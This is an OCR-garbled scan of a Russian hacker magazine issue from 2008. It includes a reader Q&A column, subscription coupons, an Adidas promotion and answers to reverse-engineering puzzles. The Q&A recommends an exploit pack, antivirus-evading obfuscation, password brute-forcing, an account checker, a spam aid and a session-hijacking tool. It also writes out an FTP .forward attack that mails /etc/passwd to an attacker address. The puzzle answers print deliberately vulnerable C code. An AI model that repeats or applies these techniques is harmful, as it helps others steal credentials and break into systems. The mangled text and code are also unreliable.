• Зрительные иллюзии в одежде (злѵіелый подбор одежды для 
коррекции дефектов фигуры) : 

В статье «Зрительные иллюзии в одежде» доходчиво объяс- 
няется, что одежда нужна не только для согрева в холоднзно 
зимнюю пору и сокрытия первичных половых признаков. Это 
еще и отличный способ изменить свою фигзфу, замаскировав 
физические недостатки за счет зрительных иллюзий: 



Н КРАСАВИЦА И ЧУДОВИЩЕ 

Почему симпатичные девушки бессознательно выбирают себе 
страшных подруг? Наверное, затем, чтобы смотреться на их фоне 
«интереснее», ведь какуже говорилось, сознание оперирует не 
абсолютными, а относительными оценками. 

Так, оранжевые круги на рисунке? вопреки здравому смыслу имеют 
совершенно идентичный диаметр, легко измеряемый линейкой. Но 
один и тот же круг в окружении кругов побольше словно «сжимается» 
— и, наоборот, раздувается от гордости на фоне младших товарищей. 

г ОПТИЧЕСКИЕ иллюзии ПРАВЯТ МИРОМ 

Скрыться от них невозможно. Даже зная об их существовании, 
оченьтрудно в очередной раз не оказаться жертвой обмана, а 
обманываем мы себя постоянно. Коварство сознания в том, что 
даже после объяснения «фокусов» иллюзии продолжают работать. 
Прими как данность: научиться воспринимать мир таким, какой он 
есть — невозможно. Однако в наших с ил ах делать «поправки на 
ветер», то есть учитывать существование обманов зрения, когда мы 
пытаемся судить об истинной природе вещей. ^ 
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Задавая вопрос, подумай! Не стоит задавать откровенно ламерские вопросы, 
ответы на которые при определенном желании можно найти и самому. Конкре- 
тизируй! Телепатов тут нет, поэтому присылай больше информации. 



□ 

0: Не подскажешь, существует ли бесплат- 
ный сервис для проверки доступности 
сайта из разных точек планеты? 

А: Такой сервис действительно есть. Называ- 
ется он НозіТгаскег и расположен по адресу 
Ьозі-Ігаскег.сопп . К примеру, я им пользовался, 
когда обновил 0М5-записи на своем домене 
и ждал, соответственно, обновления бпз-за- 
писей на всех корневых М5-серверах. Назову 
возможности сервиса: 

• Мониторинг произвольного количес- 
тва ресурсов; 

• Распределенный мониторинг ; 

• Период мониторинга — каждые 
1/5/15/30/60 минут; 



• Возможность мониторинга работы ССІ- 
с крипт о в ; 

• Поддерживаются НТТР-методы НЕАВ/ 
РОЗТ/СЕТ; 

• Возможность задавать передаваемые 
ССІ -скрипту параметры; 

• Контроль наличия нужных ключевых 
слов на странице; 

•Возможность задания ключевых слов с 
помощью регулярных выражений; 

• Возможность задания произвольного 
количества адресов для уведомления о 
сбоях сервера; 

•Накопление статистики и дальнейшее 
формирование отчетов; 

•Возможность открыть отчеты по 



одному или нескольким ресурсам для 
свободного доступа; 

•Хранение отчетов без ограничения во 
времени; 

•Возможность настройки автомати- 
ческой отсылки выбранных отчетов 
(ежедневных, еженедельных, месяч- 
ных, квартальных, годовых) на ваш 
электронный адрес; 

•Привязка к вашей временной зоне; 
•Детализация отчетов с точностью до 
дней ; 

• Возможность хранения протоколов 
проверки; 

•Возможность отсылки сообщений о 
сбоях как на электронный адрес, так и 
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на мобильный телефон, с помощью ЗМЗ- 
сообщений; 

• Моментальная проверка доступности 
ресурса . 

0: Как сохранить на жесткий диск онлайн- 
видео с УоиТиЬе, Вконтакте и пр.? 

А: Для этих целей я обычно использую про- 
грамму ѴѴМ Ресогсіег РРО [ ѵѵѵѵѵѵ.ѵѵппгесогсіег. 
сот/ѵѵпп гесогсіег рго.рбр ]. 

В ее состав входят несколько утилит для записи 
потокового аудио и видео в форматах ѴѴіп б оѵѵз 
Мебіа (ѴѴМ Весогбег) и ВеаИВМ Весогбег), а 
также программа для записи телевизионных 
трансляций в интернете (ѴѴМ ѴСВ). В утилите 
есть встроенный планировщик, предусмотрена 
многопотоковая закачка. 

Пользоваться ѴѴМ Весогбег РВО очень просто: 

1. Включай программу ; 

2. Открой сайт, где лежит нужное тебе 
видео и запусти его; 

3. Программа начинает захват; 

4. По окончании проигрывания видео- 
ролика программа сохранит его в свой 
каталог . 

Р5: Демо-версия поддерживает видеозахват 
лишь нескольких минут записи, но ничто не 
мешаеттебе использовать встроенную докачку 
(либо найти лекарство, коих в интернете очень 
много). 

0: Занимаюсь сплогами. В дизайне и 
оформлении не очень силен. ПодскажИр где 
бы проверить синтаксис моих страниц на 
соответствие стандартам ѵѵЗс? 

А: В твоем вопросе уже кроется ответ! Конечно, 
на ѵаІібаІог.ѵѵЗ.огд . Сервис проверит твою 
страницу на соответствие ВТО (официальное 
описание синтаксиса языка разметки) и укажет 
на все возможные ошибки. Особенно полезным 
сервис будет, если ты строишьѵѵар 1 .1 -1 .3- 
или ѵѵар 2.0-странички (браузеры мобильных 
телефонов очень привередливы к незакрытым 
тегам и т.д.). 

Также посоветую другие сервисы-валидаторы 
ѴѴЗ-консорциума, расположенные по адресу 
Ьі:1:р://ѵѵѵѵѵѵ.ѵѵ3.ога/0А/Тоо[5 : 

1. ЫпкСЬескег — проверка битыхссылокна 
странице (полезно 5Е0ш никам); 

2. С55 Ѵаіібаіог— проверка на валидность 
С55-стилей документа ; 

3. Рееб Ѵаіісіаіог— проверка В55 и АТОМ лент 
новостей (пригодится сплоггерам). 

0: Подскажи, где взять хорошую паблик- 
связку эксплойтов? 

А: Из недавно появившихся в паблике при- 
ватных связок мне больше всего нравится 



МеоОрЫі: 2.x ( бирзі/Логит.гІоѵ.огд/зЬоѵѵрозО 
рЬр?р=530807&ро5І:соипІ:=270 ). Приведу часть 
ее описания: 

1 . Перед выдачей сплоита анализиру- 
ется версия оси, браузера и другого 
постороннего софта на машине юзера. 

2 . Сплоиты шифруются в реальном вре- 
мени уникальным ключом. 

3 . Защита екзешника от повторной за- 
качки на 1 час . 

4 . Есть ЛИНК для маяков лоадера и 
ЛИНК необходимый самому лоадеру для 
слива ехе . 

5. Имеется «статса» по осям, браузе- 
рам, странам, реферерам, последним 
100 заходам/ загрузкам. 

6 . Уникальность загрузок смотрится 
по ір, с которого был слит ехе. 

7 . Мультиюзерность . 

8 . Пробивает ІЕ и ЕігеТох всех вер- 
сий . 

Р5: Раньше связка стоила от$1 .5кдо $3.0к в 
зависимости от конфигурации. Пользуйся, но 
помни об ответственности! 

0: Как бы мне похитрей зашифровать код 
своего іТгате? 

А: Сервис, расположенный по адресу кОб.Ыг/ 
І/Ыппісгѵрі/Ыппісгѵрі ІідЬСрЬр . поможеттебе 
перевести любойтвой Ы:пп[-код в нечитабель- 
ное состояние. Например, ты вбиваешь в окно 
«<Ь>Му Ь.бт1 сосіе Ь.еге</Ь>» и получаешь 
на выходе <зсгірб 1апдиаде= ' ПаѵаЗс 
гірЦ ' хіоситепЦ .Ѵ7гібе (ипезсаре ( ' \ 
хЗС\хб2\хЗЕ\х4В\х79\х20\хб8\х74\ 
хбВ\хбС\х20\хбЗ\хбР\хб4\хб5\х20\ 
хб8\хб5\х72 \хб5\хЗС\х2Р\хб2 \хЗЕ\ 
х2 О ' ) ) </зсгірЦ>. 

Это поможет для обхода некоторых проактив- 
ных защит, а также встроенной антивирусной 
защиты всех браузеров. Могу посоветовать и 
более сложный онлайн-сервис Ы:І:р://пе55- 
Іеат.ги/іпбех/0-8. Тѵтты найдешь несколь- 
ко уровней кодировки Ы;пп[-кода, а также 
)аѵа5сгір1:-компрессор, который позволяет 
убирать лишние символы из исходника и 
различными хитрыми способами уменьшать 
его размер. Также компрессор поддерживает 
обфускацию кода. 

0: Как проще всего искать расшаренные 
ресурсы в сетке? 

А: В этом нелегком деле тебе поможет старый 
добрый хЭЬагег 3.0. 0.9 Ргоіеззіопаі ( ѵѵѵѵѵѵ. 
ѵѵеЬ-Ьаск.ги/сІоѵѵп[оасІ/сІо\л/п[оасІ.р[ір?до=1 1 0 ). 
Это довольно известный и популярный сканер 
расшаренных ресурсов отечественного про- 
изводства. В программу встроен подборщик 




паролей к шарам. При сканировании хЭЬагег 
выводитмного полезной информации: имя 
рабочей группы, ОС, сетевое имя и МАК-адрес. 
Программа имеет приятный интерфейс, а после 
сканирования можетсохранять логи. 

Р5: Сканеры для любых ситуации можно ска- 
чать здесь: ѵѵ\л/ѵ\/.\л/е Ь - Ь а с к. ги/сіоѵѵп Іоа с1/?са зе= 1 
(либо взятье нашего диска, — Прим. РогЬ). 

0: Занимаюсь спамом. Как мне удалить из 
списка МЫЛЬНИКОВ одинаковые адреса? 

А: Спамить нехорошо и незаконно! Но, еслиты 
готов рисковать, то тебе поможет следующий 
рЬр-скрипт: 

<?р1ір 

$1і1е = Іііе ( ' етаііз . бхб ' ) ; 

$1і1е = аггау_ипідие ( $1і1е) ; 

$1р = бореп ( ' етаііз . бхб ' , ' ' ) ; 

і\л;гіРе ( $ір , ітріобе ( " \п" , $іі1е) ) ; 

ісіозе ( $ір) ; 

?> 

А вообще, есть большое количество программ 
для отсеивания дубликатов. Тотже самый 
Міегозо!"!: Ехееі. Советую юзать поиск :). 

0: Существует л и универсальная програм- 
ма для имитации действий пользователя в 
браузере? 

А: Старый добрый античат по адресу оЩ^ 
апбсЬаЕги/іпеІсгаск предоставляет тебе 
такую программу. Утилита называется 
ІпеЮгаск и предназначена для отправки на 
сервер НТТР-пакетов и получения ответа 
сервера. Исходный НТТР-пакет задается 
в текстовом виде. Программа позволяет 
вводить произвольные значения практически 
всех параметров запроса. Поддерживаются 
команды СЕТ и РС5Т. Команда РС5Т поддер- 
живаетлюбые МІМЕ-форматы передаваемых 
данных. Программа позволяет задавать или 
модифицировать следующие параметры 
запроса: СРЕ, Ре1"егег, НозЕ Сопіепі-Туре, 
Ассері-Епсосііпд, Сзег-Адепі, Соокіе, 
АиіЬогігабоп, Х-Еог\л/агбеб-Еогпе\л/, Ѵіапеѵѵ, 
СасЬе-СопІгоІпеѵѵ. Также есть кодер/декодер 
для корректного кодирования и расшифровки 
данных в СРЕ-формате. 

Ствет сервера отображается в текстовом виде, 
что позволяет видеть исходные тексты НТМЕ и 
9аѵа5сгірЕ Динамическое отображение посту- 
пающих данных от сервера позволяет отслежи- 
вать получаемую информацию отССІ-скриптов, 
работающих втакназываемом зігеапп- режиме. 
Р5: Еще существует неплохой плагин для 
ОгнеЛиса — ЕіѵеНТТРНеабегз. Сн снифает 
пакеты, которые затем можно редактировать 
и слать серверу. Скачай плагин по адресу: 
[іѵеЬирЬеабегз.ппогбеѵ.огд . 
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0: Подскажи, где взять чекер аккаунтов 
Яндекса? 

А: Тутлежит неплохой чекер: тѵіѵѵогпп.сопп/ 
риЫісЛоо[5/уасЬ-0.5.2ІрУасЬ 0.5 . Из возмож- 
ностей тулзы: 

• Проверка валидности связок 
1одіп;разз из текстового файла; 

• Вывод полученной инфы в файл; 

• Проверка на наличие Яндекс. Денег и 
их количества. 

0: От чего зависит Вивіпезз Ьеѵеі (ВЬ] в 
моем >ѴеЬМопеу-кошельке? 

А: Вотофициальная выдержка по поводу ВІ 
с сайта вебмани: «Параметр Бизнес уровень 
[Ви51МЕ55 ІЕѴЕІ (ВІ)] - это публичная 
характеристика уровня деловой активности 
пользователя (ѴѴМШ), вычисляемая систе- 
мой на основе данных о продолжительности 
активного использования системы ѴѴеЬтопеу 
Тгапзі'ег, количестве корреспондентов, с ко- 
торыми у пользователя имелись трансакции, 
объеме проведенных трансакций, отсутствии 
или наличии претензий к пользователю со 
стороны системы. Представляет собой целое 
положительное число в диапазоне от О до 
1 0000. Параметр ВІ обновляется каждые 3 
часа. ВІ не зависит оттипа аттестата». 

0: Как бы мне, имея РТР-доступ к серверу, 
прочитать /е(с/ра55ѵ/сІ? 

А: Тебе для этого необходимо выполнить следу- 
ющий і"1:р-сценарий со своего сервера: 

ЬазП# саС ту:Еогѵ^аг(і_Уі1е 

"саС /еСс/раззѵ^сі I /Ьіп/таіі ПаскегѲ 

таіі.ги " 

ЬазП# іЕСр ѵісРіт.сот 

СоппесРесі Со ѵісСіт.сот 

22 0 ѵісСіт РТР зегѵег геасіу 

Ыате (ѵісСіт. сот:Паскег) : ССр 

331 СиезС Іодіп ок, зегкТ уои е-таі1 

аз раззѵ\?огсЗ. 

Раззѵ/огсЗ: 

230 СиезС Іодіп ок, ассезз 
гезСгісСіопз арріу. 
іСр> 1з -1 

22 0 РОКТ согптапсі зиссезіиі. 

150 Орепіпд АЗСІІ тосЗе 
сЗаСа соппесСіоп іог ' /Ьіп/ 

1з' . (192.168.1.1, 2335) (ОЬуСез) 
СоСаІ 4 

сіг-хг-хг-х 2 гооС орегаСог 512 РеЬ 2 8 
2000 Ьіп 

сЗг-хг-хг-х 2 гооС орегаСог 512 Зер 18 
2000 еСс 

сЗгѵ7хгѵ7хгѵ\;1: 13 гооС орегаСог 1024 Пиі 
1 00:55 іпсотіпд 



Ьгѵ^хг-хг-х 3 гооС орегаСог 512 РеЬ 19 
10:25 риЬ 

226 Тгапзіег сотрІеСе. 

іСр>риС туіогѵ7агЬ_іі1е . іогѵ^^агЬ 

іСр>диіС 

ЬазЬ# есЬо ’Уои а ЬаскеЬ' I таіі іСр@ 
ѵісСіт. сот 

В итоге, когда почту ото шлют юз еру II; р, вы- 
полнится .Іогѵѵагб-файл. Если у демона будет 
достаточно прав для чтения /еіс/раззѵѵб, то его 
содержимое придет ктебе на мыло. 

0: Как перенести всю почту на новый Отаіі- 
аккаунт со старого ящика? 

А: Для этого понадобится внутренняя Отаіі- 
утилита — Маіі Реісбег. Алгоритм действия по 
шагам следующий: 

• Первым делом заходим в старый аккаунт и в 
настройках выбираем вкладку «Пересылка», 
в которой находятся настройки для РОР/ІМАР. 
Нам нужно активировать опцию «Включить 
РОРдля всех писем» (РОРІогаи таШ и сохра- 
нить изменения. После этого, в том же разделе 
«РОР-загрузка» (РОР ВоѵѵпЬаб), появится 
отметка отом, что РОР включен. 

• Теперьзаходим в настройки уже нового 
ящика, где выбираем вкладку «Аккаунты» 
(Ассоипіз). Далее, в разделе «Получение 
почты из других аккаунтов» (ОеІ таііігот оібег 
ассоипіз), кликаем по ссылке «Добавить другой 
адрес электронной почты» (Абб апоібег таіі 
ассоипі) и вводим нужный адрес. 

Придется немного подождать, пока Отаіі пере- 
местит каждое письмо по РОРЗ. 

0: Что такое трехмерный штрихкод? 

А: В привычном понимании, штрихкод — это 
последовательность черных и белых полос, 
представляющих информацию втом виде, 
который удобен для считывания техническими 
средствами. Трехмерный штрихкод, матрич- 
ный или ОР-код — дальнейшее развитиеэтой 
технологии. Можно прямо в штрихкод записать 
некоторую, невидимую для глаза информацию. 
Ее легко будет расшифровать прямо на экране 
ноутбука или даже телефона (предварительно 
сфотографировав), используя несложные 
программы-декодеры. 

К примеру, в ОР-коде может быть зашифрован 
ПРЕ сайта или адрес. В отличие отобычного 
штрихкода, где информацию несеттолько 
порядокчерточекв горизонтальном направле- 
нии, ОР использует для кодирования данных 
одновременно вертикальное и горизонтальное 
направления. Поэтому на той же самой площа- 
ди уместится значительно больше информа- 
ции. Расшифровывать код можно в любом из 
направлений, часто — даже при поврежденном 
изображении. В рекламных целяхтехнология 



успешно применяется вЯпониии Америке. 
Компания, кпримеру, кодируетсвой ЕІРЕ-адрес 
и помещает в рекламу, стенды ит.д. Людям 
достаточно сфотографировать изображение, 
расшифроватьспециальной программой итут 
же перейти на сайт прямо со своего телефона. 
Если хочешьзашифровать свой текст в ОР-код, 
можешь воспользоваться бесплатным гене- 
ратором — Ьир://д гсобе.каѵуѵа.сот . А чтобы 
расшифровать, — подойдет небольшая тулза 
[ Ьир://\л/\л/\л/.іпІ:е[сопп.ги/2б/епд[І5Ь/беппо.р: р ) 
для компьютера или баѵа-апплет для телефона 
( Ы:І:р://ппоЬі[есобе5.покіа.сопп/5сап.Ы:пп ). 

0: Как проще всего организовать несколько 
рабочих столов для ѴѴіпсІоѵѵв? 

А: Подходящихутилит сейчас пруд пруди. Но я 
настоятельно рекомендую недавно появившу- 
юся утилиту от Марка Руссиновича, извест- 
ного специалиста по внутреннемуустройству 
ѴѴіпбоѵѵз. Приложение весит всего 62 Кб и 
доступно для закачки с сайта МісгозоЛ: ІесЬпеЕ 
тісгозоЛ.сот/еп-из/зѵзіпІегпаІз/ссбІ 7881 . 
азрх . 

0: Как взломать аккаунт на бтаіі? 

А: Большая проблема ОтаіГа втом, что после 
аутентификации, во время которой использует- 
ся 551, весьтрафик начинается передаваться 
по обычному НТТР-каналу. Это не могло остать- 
ся безнаказанным. На недавно прошедшей 
хакерской конференции Оеісоп была представ- 
лена х-тулза Тбе Міббіегдля автоматического 
сбора аккаунтов у пользователей Отаіі, кото- 
рые в своем профиле не включили использова- 
ние защищенного соединения на протяжении 
всей работы («Аіѵѵауз изе Ыірз»). Замечу, что 
подобная опция появиласьсовсем недавно. 

По сути, это обычный снифер, но написанный 
на РиЬу (исходники открыты) и специально 
заточенный для перехвата пользовательских 
кукисов. Естественно, Отаіі — не единствен- 
ное поле для деятельности. Чуть ли не каждый 
второй сервис (взять тотже Ыѵебоигпаі) дейст- 
вует по похожей схеме, и после авторизации с 
использованием НТТР5-шифрования начина- 
ет передавать информацию в открытом виде. 
После получения зеззіоп 10 можно проникнуть 
в аккаунт даже без знания пароля. ТЬе Міббіег 
уже сейчас умеет следующее: 

• клонировать изег-сесии в любом приложении, 
которое использует передачу данных по НТТР; 

• заменятьссылки с использованием безопас- 
ного НТТР5 на НТТР; 

• автоматически пересылать браузер жертвы 
на сайтэксплоитами (на МеІазрЫі), выполняю- 
щимися на стороне клиента; 

• автоматически собирать и менять всю при- 
ватную информацию ожертве. 

В общем, страшное оружие. ^-[І 
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ГОДОВАЯ ПОДПИСКА ПО ЦЕНЕ 

2100 руб. ( на 15% дешевле чем 

’ при покупке в розницу) 



Единая цена по всей России. Доставка за счет издателя, 
в том числе курьером по Москве в пределах МКАД 



ВНИМАНИЕ! 

ВТОРОЕ СПЕЦПРЕДЛОЖЕНИЕ! 

При подписке на комплект журналов 
ЖЕЛЕЗО + ХАКЕР + ГТ СПЕЦ: 

- Один номер всего за 155 рублей (на 25% дешевле, чем в розницу) 

ЗА 12 МЕСЯЦЕВ ЗА 6 МЕСЯЦЕВ 





Подписка на журнал «ХАКЕР+ОѴО» на 6 месяцев 
стоит 1200 руб. 



ВЫГОДА • ГАРАНТИЯ • СЕРВИС 

КАК ОФОРМИТЬ ЗАКАЗ 

1 . Разборчиво заполните подписной купон и квитанцию, вырезав 
их из журнала, сделав ксерокопию или распечатав с сайта тт. 
діс.гц. 

2. Оплатите подписку через Сбербанк . 

3. Вышлите в редакцию копию подписных документов — купона и 
квитанции — любым из нижеперечисленных способов: 

• по электронной почте зиЬ8СгіЬе@дІс.ги; 

• по факсу 8 (495) 780-88-24; 

• по адресу 119021, Москва, 

ул. Тимура Фрунзе, д. 11, стр. 44, 

ООО «Гейм Лэнд», отдел подписки. 

ВНИМАНИЕ! 

Подписка оформляется в день обработки купона и квитанции в редакции: 

• в течение пяти рабочих дней после отправки подписных документов в 
редакцию по факсу или электронной почте; 

• в течение 20 рабочих дней после отправки подписных документов по 
почтовому адресу редакции. 

Рекомендуем использовать факс или электронную почту, в последнем 
случае предварительно отсканировав или сфотографировав документы. < 
Подписка оформляется с номера, выходящего через один кален- 
дарный месяц после оплаты. Например, если вы производите оплату в 
ноябре, то журнал будете получать с января. 



По всем вопоосам 



связанным с подпиской, звоните по бесплатным телефонам 8(495)780-88-29 (для москвичей) 
и 8(800)200-3-999 (для жителей других регионов России, абонентов сетей МТС, БиЛайн и Мегафон). Вопросы 
о подписке можно также направлять по адресу іпГо@дІс.ги или прояснить на сайте ѵѵѵѵѵѵ.СІС.ги 



ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ « 



□ на 6 месяцев 

□ на 12 месяцев 

начиная с 



. 2008 г. 



I — I Доставлять журнал по почте 
' — ' на домашний адрес 



Доставлять журнал курьером : 

□ на адрес офиса* 

□ на домашний адрес** 



(отметь квадрат выбранного варианта подписки) 

Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 



область/край 



город 



улица 



ДОМ 



корпус 



квартира/офис 



телефон ( 



е-таіі 



сумма оплаты 



*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 
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7729410015 



ООО «Гейм Лэнд» 



АБ «ОРГРЭСБАНК», г. Москва 



р/с Мо 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 
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Ф.И.О. 
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Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


2008 г. 





Ф.И.О. 



Подпись плательщика 







Этим летом компания асіісіаз запустила уникальный интер- 
активный проект — асіісіаб ^ооіЬаІІ тападег 2008, приуро- 
ченный к чемпионату Европы по футболу. Любой желающий, 
зайдя на сайт игры и пройдя регистрацию, становился ме- 
неджером футбольной команды. На ее создание он получал 
сумму в 30 млн. условных единиц. Список футболистов, кото- 
рых игрок мог «купить» для своей команды, был составлен 
из реальных участников Чемпионата Европы. Все они были 
разбиты на четыре группы: вратари, защитники, полузащит- 
ники и нападающие. Каждый из них имел свою трансферную 
стоимость. У менеджера была возможность выбирать схему 
игры, проводить замены (их количество ограничивалось 
этапами турнира) и вести трансферную политику. 

В зависимости оттого, как приобретенные менеджером 
футболисты выступали в реальных матчах, его виртуальная 
команда набирала или теряла очки. Чтобы сделать игру еще 
более интересной, каждому менеджеру разрешалось набрать 
три полноценные команды. 

Конечно, модель, использовавшаяся в проекте, слишком про- 
ста, чтобы реально научиться управлять футбольными процес- 
сами, но чтобы понять общие принципы, такой схемы более 
чем достаточно. А самое главное — азарт игры заражал участ- 
ников настолько, что многие из них писали письма в компа- 
нию асіісіаз с просьбами не закрывать проект, а продолжить 
его в рамках Чемпионата России. Приятно, что начинающих 
менеджеров интересует не только управление суперзвездами 
мирового футбола, но и наш родной чемпионат. 

Помимо использования базовых принципов управления 
командой, в игре были и свои фишки — например, задейст- 
вованы качества, необходимые любому футболисту: сила, 
тактика, скорость и техника. Воплощали их картонные чело- 
вечки асіісіаз с прототипами из числа настоящих футбольных 
звезд. Стивен Джерард представлял Силу, Кака — Тактику, 
Лионель Месси — Скорость и Технику. Они сопровождали 
менеджера по всему сайту и давали полезные советы. После 
того, как менеджер набирал себе команду, он мог оценить ее 



общий стиль. Для формирования в молодом человеке базо- 
вых принципов футбольного управленца это уже немало. 
Итак, попытка привлечь внимание молодежи к процессу 
управления командой, предпринятая компанией асіісіаз, 
оказалось очень успешной. За время Чемпионата Европы 
в игре зарегистрировалось около 72 000 команд от 30 000 
участников. Ежедневно на сайт проекта заходило 10-13 ты- 
сяч человек. Возможно, 30 000 футбольных менеджеров для 
нашей страны это перебор, но если, благодаря проекту, хоть 
кто-то из участников игры примет решение и дальше про- 
фессионально развиваться в этом направлении, то можно не 
сомневаться — на 16 команд Премьер Лиги профессиона- 
лов хватит. Может быть, останется и на первую лигу. А если 
асіісіаз не остановится на достигнутом, то не за горами день, 
когда принимать решение о покупке российских футболистов 
в Барселоне будут наши соотечественники. Ждем этого и не 
дадим дилетантам развалить то, что уже построено. 

Подводя итог, можно сказать, что за такими проектами, как 
асіісіаз ^ооіЬаІІ тападег, пусть на первый взгляд они и ка- 
жутся просто игрушками, прячется будущее нашего клубного 
футбола, а за ним — и сборной. Хочется верить, что асіісіаз 
будет продолжать и дальше радовать нас интересными 
футбольными проектами и внушать надежду, что бронзовые 
медали Чемпионата Европы — далеко не предел. 

Финальный матч Чемпионата Европы по футболу состоялся 
29го июня. Для участников проекта в этот день финал был не 
один, а целых два. В этот же день были подведены итоги ин- 
терактивной игры от компании асіісіаз. Победители первого 
финала получили гордое звание Чемпионов Европы и заслу- 
жили безграничную любовь и уважение своих болельщиков. 
Победители финала номер два, конечно, не стали кумирами 
для всего футбольного мира, как игроки сборной Испании, но 
своим наградам были рады не меньше. 

Мы представляем вашему вниманию фото-отчет с церемо- 
нии награждения победителей интерактивной игры асіісіаз 
^ооіЬаІІ тападег. 





Менеджер, чья команда набрала наибольшее 
количество очков, стал обладателем главного приза 
— полного комплекта футбольной экипировки 
от компании абібав. 

Сюда ВОШЛИ: парадный костюм, утепленная куртка, 
поло, шорты, кепка, футболка, игровая футболка, 
игровые шорты, гетры, гцитки, подтрусники, сумка, 
мяч асіісіав Еигоравв, игровые бутсы абісіав. 
Участники, чьи команды заняли со 2 по 7 место, 
получили игровые бутсы абібаз и официальный 
футбольный мяч Евро 2008 асіісіаз Еигоразз. 



призы 
для лучших 
менеджеров 



ХИТРЫЕ ПРИЕМЫ УДАЛЕННОГО ВЗЛОМА ѴѴІЫ00ѴѴ5 












«о...... ПРЕДСТАВЛЯЕТ 

па РЕЦЕПТѴ пДМЕРИНаНСКОГО ПИРОГА» 





в КНІОТЕАТРДХ с 11 СЕНТЯБРЯ 



шшпіѵ;<тг .шміііцші ІІМІІ1ІЮѴ шііш 

В^ПСІЯ бШАВ иш нище 

^шмпіг^яііт^^^иіімі^ ішйгімііш 
*ЧШ ІЙШ ІШ "ЯІВШІ 

мтзещіл »лпЛАьСО^^ЕеЕП^М.I*и 
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РУ221Е 




ИВАН СКЛЯРОВ 



пройдись ДЕБАГГЕРОМ ПО МОЗГАМ 



Ш стесняйся присылать свои ответы, даже если смог ответить 



Йсего на один пазл. Я с интересом почитаю оригинальные 
Варианты решений. Ну, а герои, которые первыми правильно 



ответят на все вопросы, получат призы и увидят свои имена 
Йа страницах ][■ Помни: в большинстве случаев вариант 



бтвета засчитывается как правильный, только если к 



нему приложено подробное и ВЕРНОЕ объяснение. 
Победитель, занявший первое место, получает также книгу от 



ведущего рубрики! 



ОТВЕТ НА ПАЗЛ №і 
к<НЮХАЧИ НА ПРОВОДЕ^ 

Чтобы дать ответ на эту задачу, нужно знать, как работают коммуникационные ус- 
тройства, показанные на рисунке. Репитор и хаб передают данные, пришедшие с 
одного порта, на все остальные свои порты, совершенно не интересуясь, что это 
за данные и кому они предназначены. Мосты и свитчи избирательно относятся к 
данным, просматривают за головки кадров и пересылают их из одного сегмента 
сети в другой только втом случае, если адрес назначения (МАС-адрес) принад- 
лежит другому сегменту. Маршрутизаторы еще сильнее изолируют подсети друг 
от друга и передают данные из одной подсети в другую, основываясь на инфор- 
мации, хранящейся в ІР-заголовках. 

Такчто, единственный компьютер, с которого можно обмениваться данными с 
компьютером «А» вуказанной сети, неопасаясь, чтотрафикбудетпрослушан 
одним из сниферов, это компьютер под номером 7. 




Фраза набрана на русском 
языке, но в греческой раскладке 
клавиатуры. Если нажимать те 
же клавиши в русской расклад- 
ке, то фраза будет выглядеть 
так: «ГРЕЧЕСКАЯ РАСКЛАДКА 
КЛАВИАТУРЫ». 

Все существующие расклад- 
ки клавиатур можно увидеть 
на сайте МісгозоЛ по адресу: 
ѵѵѵѵѵѵ.ппісговоЛ.сопп/дІоЬаІсІеѵ/ 
геІ"егепсе/кеѵЬоагсІ5.пп5рх . 



ОТВЕТ НА ПАЗЛ №2 | 



«отдай пароль» 

Правильный пароль: «рроеауькз» (записанное наоборот 
«ЗКЬУАКОРР»). Исходный код программы РАЗЗШКВ . сом 
на ассемблере с комментариями можно найти на диске 
кжурналу. В качестве пояснения скажу, что над каждым 
символом введенной строки выполняется операцияхокна 
соответствующие А5СИ-КОДЫ символов строки «раззѵѵогсі». 
К каждому полученному коду затем прибавляется еще и зна- 
чение 991і. Кромеэтого, содержащиеся в программе девять 
А5СП-КОДОВ слова «зСапЛагсі» складываются с кодами 
начала программы (начиная с метки ЗСагс). 

Полученные две строки сравниваются, и если они равны, на 
экран выводится «ок ' ». 



ОТВЕТ НА ПАЗ Л №4 
«БАГАБАГА» 

Программа «ЬадаЬада» упакована с помощью ПРХ, однако распаковать ее командой 
«ирх -Л ЬадаЬада» не получится: в файле нарушена контрольная сумма. Чтобы 
получить код программы, можно снять дамп в памяти и восстановить та блицу импорта 
с помощью инструмента РЕТооІз (ищи мануал по использованию в интернете или в 
моей книге «Головоломки для хакера»). 

Программа содержиттри ошибки переполнения буфера в стеке и одну ошибку 
форматной строки. Надискеты можешьнайти полный исходный кодпрограммы 
ЬадаЬада, а ниже приведена бажная функция Ок ( ) из этого кода, которая содержит 
все уязвимости: 







і 





/ / функция с четырьмя уязвимостями 
ѵоіЬ Ок (сопзС сЬаг* іприС) 

{ 

сЬаг ЬиГ [50 ] ; 



ІГ ( ! зДгпстр ( іприЦ , "Ьада" , 4)) { 



► 158 




ХАКЕР 09 /117/ С 



ни Д 







ипі'іг 




// уязвимость форматной строки 
// и переполнение буфера в стеке 
зргіпбб (Ьиб , іприб) ; 

} еізе іб ( збгзРг ( іприб , "2008")) { 

/ / переполнение буфера в стеке 
зРгсру(Ьиб, іприб) ; 

} еізе іб ( іприР [3 ] == ' X ' ) { 

// переполнение буфера в стеке 
// неправильное использование зРгІеп ( іприР ) 
зРгпсру(Ьиб, іприб , збгіеп ( іприб ) ) ; 

} еізе 

зРгпсру(Ьиб, іприб , зізеоб (Ьиб) ) ; 

МеззадеВох (ШЬЬ, Ьиб, «ВадаЬада», МВ_ОК) ; 

} 

Как видишь, в функции определен буфер Ьиб [ 50 ] . 

Ошибка форматной строки проявляется, только если в начале 




строки присутствует слово «Ьада». Например, если ввести строку 
«Ьада %сІ %0 %0» (без кавычек), то можно посмотреть значения 
из стека. 

Первая ошибка переполнения буфера в стеке проявляется, 
когда переданная строка оказывается больше 50 символов и в 
начале строки присутствует слово «Ьада». Причина — в функции 
зргіпСб(ЬиП, іприС ), которая записывает в буфер ЬиП строку 
іприС без всякой проверки на количество записываемых данных 
(заметь, в этой функции отсутствует еще и спецификатор формата). 
Вторая ошибка переполнения буфера в стеке проявляется, если пе- 
редана строка больше 50 символов и в строке присутствует подстро- 
ка «2008». Причина — в функции зСгсру(ЬиП, іприС ), которая 
неделаетпроверку на количество передаваемых в буферданных. 

И третья ошибка переполнения буфера в стеке проявляется, если 
передана строка больше 50 символов, а четвертым символом в 
строке является латинская буква X. Причина — в неверном исполь- 
